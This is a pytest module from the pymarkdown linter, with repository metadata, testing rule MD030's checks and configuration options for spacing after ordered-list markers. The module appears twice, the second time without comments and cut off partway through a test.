7ae408ba0b24506fa07552ffe520750bbff38c53
|
[
"MIT"
] | 304
|
2020-08-15T23:24:00.000Z
|
2022-03-31T23:34:03.000Z
|
test/test_md030_ordered.py
|
jackdewinter/pymarkdown
|
7ae408ba0b24506fa07552ffe520750bbff38c53
|
[
"MIT"
] | 3
|
2021-08-11T10:26:26.000Z
|
2021-11-02T20:41:27.000Z
|
"""
Module to provide tests related to the MD030 rule.
"""
from test.markdown_scanner import MarkdownScanner
import pytest
# pylint: disable=too-many-lines
@pytest.mark.rules
def test_md030_bad_configuration_ol_single():
"""
Test to verify that a configuration error is thrown when supplying the
ol_single value with a string that is not an integer.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' must be of type 'int'."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_single_zero():
"""
Test to verify that a configuration error is thrown when supplying the
ol_single value with an integer not greater than 0.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' is not valid: Allowable values are any integer greater than 0."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
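# Editorial note, not part of the original test module: in pymarkdown's
# "--set key=value" syntax the "$#" prefix appears to request an integer
# value, which is why the valid settings below are written as e.g.
# "plugins.md030.ol_single=$#2" while the type-error tests pass bare strings.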
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi():
"""
Test to verify that a configuration error is thrown when supplying the
ol_multi value with a string that is not an integer.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' must be of type 'int'."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi_zero():
"""
Test to verify that a configuration error is thrown when supplying the
ol_multi value with an integer not greater than 0.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' is not valid: Allowable values are any integer greater than 0."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_x():
"""
Test to make sure this rule does not trigger with a document that
contains ordered lists with a single space after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_1_2():
"""
Test to make sure this rule does not trigger with a document that
contains ordered lists with a single space after the marker,
with configuration. ol_multi does not come into effect as all
list items are single-line.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_2_1():
"""
Test to make sure this rule does trigger with a document that
contains ordered lists with a single space after the marker,
and configuration that applies.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single():
"""
Test to make sure this rule does trigger with a document that
contains ordered lists with two spaces after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_1_2():
"""
Test to make sure this rule does trigger with a document that
contains ordered lists with two spaces after the marker and
configuration for multi line lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_2_1():
"""
Test to make sure this rule does not trigger with a document that
contains ordered lists with two spaces after the marker,
and configuration to make it okay.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_1_2():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with one space after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_2_1():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with one space after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two spaces after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_1_2():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two spaces after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_2_1():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two spaces after the marker,
and configuration.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker,
single-paragraph and double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two spaces after the marker,
single-paragraph and double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double_2_1():
"""
Test to make sure this rule does not trigger with a document that
contains nested ordered lists with one space after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md:4:4: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single_nested_double.md:7:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two spaces after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double_2_1():
"""
Test to make sure this rule does trigger with a document that
contains nested ordered lists with two spaces after the marker,
single-paragraph and nested double-paragraph lists.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
| 28.714465
| 123
| 0.657307
|
from test.markdown_scanner import MarkdownScanner
import pytest
@pytest.mark.rules
def test_md030_bad_configuration_ol_single():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' must be of type 'int'."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_single_zero():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' is not valid: Allowable values are any integer greater than 0."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' must be of type 'int'."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi_zero():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' is not valid: Allowable values are any integer greater than 0."
)
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_x():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single():
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_double_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double():
scanner = MarkdownScanner()
supplied_arguments = [
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_1_2():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_double_config_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--stack-trace",
"scan",
"test/resources/rules/md030/bad_spacing_ol_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_double.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested():
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double():
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_nested_double_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single_nested_double.md:4:4: "
